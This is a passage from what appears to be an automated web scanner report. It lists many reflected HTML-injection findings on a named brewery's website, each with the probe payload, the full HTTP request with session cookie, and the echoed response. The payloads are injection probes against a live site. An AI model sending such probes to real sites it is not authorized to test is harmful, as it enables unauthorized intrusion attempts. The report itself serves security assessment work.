The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22a36"><a>9072d5717d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /merchandise22a36"><a>9072d5717d1/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="merchandise22a36"><a>9072d5717d1_page" class="merchandise22a36">
...[SNIP]...

1.199. http://www.ninkasibrewing.com/merchandise/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/merchandise/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25227"><a>b79974bebcc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /merchandise25227"><a>b79974bebcc/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="merchandise25227"><a>b79974bebcc_page" class="merchandise25227">
...[SNIP]...

1.200. http://www.ninkasibrewing.com/merchandise/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/merchandise/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89685"><a>8d9b398e636 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /merchandise89685"><a>8d9b398e636/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="merchandise89685"><a>8d9b398e636_page" class="merchandise89685">
...[SNIP]...

1.201. http://www.ninkasibrewing.com/merchandise/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/merchandise/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bca3"><a>74020e256ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /merchandise3bca3"><a>74020e256ae/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="merchandise3bca3"><a>74020e256ae_page" class="merchandise3bca3">
...[SNIP]...

1.202. http://www.ninkasibrewing.com/merchandise/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/merchandise/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3133"><a>eb248c2c902 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /merchandised3133"><a>eb248c2c902/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="merchandised3133"><a>eb248c2c902_page" class="merchandised3133">
...[SNIP]...

1.203. http://www.ninkasibrewing.com/merchandise/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/merchandise/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea445"><a>ad2f0e43886 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /merchandiseea445"><a>ad2f0e43886/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="merchandiseea445"><a>ad2f0e43886_page" class="merchandiseea445">
...[SNIP]...

1.204. http://www.ninkasibrewing.com/nw_local_challenge/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/nw_local_challenge/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db203"><a>4f8704b46ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nw_local_challengedb203"><a>4f8704b46ee/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="nw_local_challengedb203"><a>4f8704b46ee_page" class="nw_local_challengedb203">
...[SNIP]...

1.205. http://www.ninkasibrewing.com/nw_local_challenge/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/nw_local_challenge/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38544"><a>e12729cb39a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nw_local_challenge38544"><a>e12729cb39a/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="nw_local_challenge38544"><a>e12729cb39a_page" class="nw_local_challenge38544">
...[SNIP]...

1.206. http://www.ninkasibrewing.com/nw_local_challenge/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/nw_local_challenge/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81cc4"><a>8f45631c571 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nw_local_challenge81cc4"><a>8f45631c571/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="nw_local_challenge81cc4"><a>8f45631c571_page" class="nw_local_challenge81cc4">
...[SNIP]...

1.207. http://www.ninkasibrewing.com/nw_local_challenge/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/nw_local_challenge/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54de6"><a>a3833a021cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nw_local_challenge54de6"><a>a3833a021cc/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="nw_local_challenge54de6"><a>a3833a021cc_page" class="nw_local_challenge54de6">
...[SNIP]...

1.208. http://www.ninkasibrewing.com/nw_local_challenge/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/nw_local_challenge/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95d04"><a>66d6e311014 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nw_local_challenge95d04"><a>66d6e311014/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="nw_local_challenge95d04"><a>66d6e311014_page" class="nw_local_challenge95d04">
...[SNIP]...

1.209. http://www.ninkasibrewing.com/nw_local_challenge/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/nw_local_challenge/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c482f"><a>c37a6af9fd4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nw_local_challengec482f"><a>c37a6af9fd4/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="nw_local_challengec482f"><a>c37a6af9fd4_page" class="nw_local_challengec482f">
...[SNIP]...

1.210. http://www.ninkasibrewing.com/nw_local_challenge/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/nw_local_challenge/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa881"><a>c321163ae3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nw_local_challengefa881"><a>c321163ae3c/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="nw_local_challengefa881"><a>c321163ae3c_page" class="nw_local_challengefa881">
...[SNIP]...

1.211. http://www.ninkasibrewing.com/process/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/process/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a9d3"><a>dfa1e21e09f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /process7a9d3"><a>dfa1e21e09f/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="process7a9d3"><a>dfa1e21e09f_page" class="process7a9d3">
...[SNIP]...

1.212. http://www.ninkasibrewing.com/process/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/process/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92128"><a>951cf91d628 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /process92128"><a>951cf91d628/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="process92128"><a>951cf91d628_page" class="process92128">
...[SNIP]...

1.213. http://www.ninkasibrewing.com/process/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/process/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da51d"><a>b4ca083e972 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /processda51d"><a>b4ca083e972/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="processda51d"><a>b4ca083e972_page" class="processda51d">
...[SNIP]...

1.214. http://www.ninkasibrewing.com/process/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/process/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 464a8"><a>b51a0c71a0d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /process464a8"><a>b51a0c71a0d/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 21 Nov 2010 21:54:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="process464a8"><a>b51a0c71a0d_page" class="process464a8">
...[SNIP]...

1.215. http://www.ninkasibrewing.com/process/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/process/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e00c"><a>fc68d60c0f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /process6e00c"><a>fc68d60c0f3/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="process6e00c"><a>fc68d60c0f3_page" class="process6e00c">
...[SNIP]...

1.216. http://www.ninkasibrewing.com/process/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
